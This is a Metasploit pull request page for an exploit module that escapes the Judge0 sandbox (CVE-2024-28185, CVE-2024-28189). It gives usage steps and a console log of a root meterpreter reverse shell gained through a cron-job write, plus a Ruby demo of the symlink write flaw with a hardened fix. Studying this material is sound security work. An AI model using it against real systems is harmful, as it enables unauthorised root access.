rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Add module: Judge0 sandbox escape CVE-2024-28185, CVE-2024-28189 #19584

Closed Takahiro-Yoko closed 1 week ago

Takahiro-Yoko commented 1 month ago

Fixes https://github.com/rapid7/metasploit-framework/issues/19149

Vulnerable Application

Judge0 does not account for symlinks placed inside the sandbox directory, which can be leveraged by an attacker to write to arbitrary files and gain code execution outside of the sandbox.

The vulnerability affects:

* Judge0 <= 1.13.0

This module was successfully tested on:

* Judge0 (v1.13.0) installed with Docker on Ubuntu 20.0.4

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/linux/http/judge0_sandbox_escape_cve_2024_28189
  4. Do: run lhost=<lhost> rhost=<rhost>
  5. You should get a meterpreter

Scenarios

msf6 > use exploit/linux/http/judge0_sandbox_escape_cve_2024_28189
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/judge0_sandbox_escape_cve_2024_28189) > run lhost=192.168.56.1 rhost=192.168.56.15

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Version 1.13.0 detected, which is vulnerable
[+] The target appears to be vulnerable.
[*] Writing cron job to /etc/cron.d/NoIkOQee
[*] Use language: 54, C++ (GCC 9.2.0)
[+] Deleted /etc/cron.d/NoIkOQee
[+] Deleted /root/FYiyRjmjQt
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.15:45438) at 2024-10-29 08:49:03 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : Debian 10.2 (Linux 5.4.0-196-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > pwd
/root
meterpreter > 
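The bug class behind this module, as an added illustration that is not part of the PR or of Judge0's code: a host-side routine that writes a submission's result into the sandbox directory with a plain write follows any symlink the submission planted there, so the data lands wherever the symlink points (the module above uses exactly this to drop a file under /etc/cron.d/). The hardened variant refuses symlinks and paths that resolve outside the sandbox, and opens with O_NOFOLLOW so a symlink swapped in after the check still fails. Function names, the "stdout.txt" result name and the temporary directories are assumptions made for the demo.

```ruby
require 'tmpdir'
require 'fileutils'

class SandboxEscape < StandardError; end

# Vulnerable (illustrative, not Judge0's code): File.write follows a symlink
# left in the sandbox, so the result is written to the symlink's target.
def write_result_vulnerable(sandbox_dir, name, data)
  File.write(File.join(sandbox_dir, name), data)
end

# Hardened: no path separators or dotfiles in the name, no symlinks, only a
# regular file whose resolved path stays under the sandbox, and O_NOFOLLOW on
# the actual open so a symlink swapped in between check and open is rejected.
def write_result_hardened(sandbox_dir, name, data)
  raise SandboxEscape, 'bad result name' if name.include?('/') || name.start_with?('.')

  root = File.realpath(sandbox_dir)
  path = File.join(root, name)

  if File.exist?(path) || File.symlink?(path)
    st = File.lstat(path)
    raise SandboxEscape, 'symlink in sandbox' if st.symlink?
    raise SandboxEscape, 'not a regular file' unless st.file?
    raise SandboxEscape, 'resolves outside sandbox' unless File.realpath(path).start_with?(root + '/')
  end

  flags = File::WRONLY | File::CREAT | File::TRUNC | File::NOFOLLOW
  File.open(path, flags, 0o600) { |f| f.write(data) }
end

# Constructed demo: a fake "host" directory and a sandbox in which the
# submission has planted stdout.txt -> host/cron_job. Returns the host file's
# contents after the vulnerable write and whether the hardened write refused.
def demo
  Dir.mktmpdir do |tmp|
    host = File.join(tmp, 'host')
    sandbox = File.join(tmp, 'box')
    FileUtils.mkdir_p(host)
    FileUtils.mkdir_p(sandbox)

    target = File.join(host, 'cron_job')
    File.write(target, '')
    File.symlink(target, File.join(sandbox, 'stdout.txt'))   # planted by the submission

    write_result_vulnerable(sandbox, 'stdout.txt', "* * * * * root id > /tmp/pwned\n")
    leaked = File.read(target)   # attacker-controlled content now sits in host/cron_job

    refused = begin
      write_result_hardened(sandbox, 'stdout.txt', 'benign output')
      false
    rescue SandboxEscape
      true
    end

    [leaked, refused]
  end
end

if __FILE__ == $PROGRAM_NAME
  leaked, refused = demo
  puts "vulnerable write leaked: #{leaked.inspect}"
  puts "hardened write refused:  #{refused}"
end
```

The check-then-open pattern alone is racy if the sandboxed process is still running when results are collected; the O_NOFOLLOW flag on the open is what closes that window for the final path component, and the realpath check covers symlinked parent directories.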
jheysel-r7 commented 1 week ago

Release Notes

This adds an exploit module for a Judge0 sandbox escape which exploits CVE-2024-28185 and CVE-2024-28189 and allows for unauthenticated RCE. Judge0 version 1.13.0 and prior are vulnerable.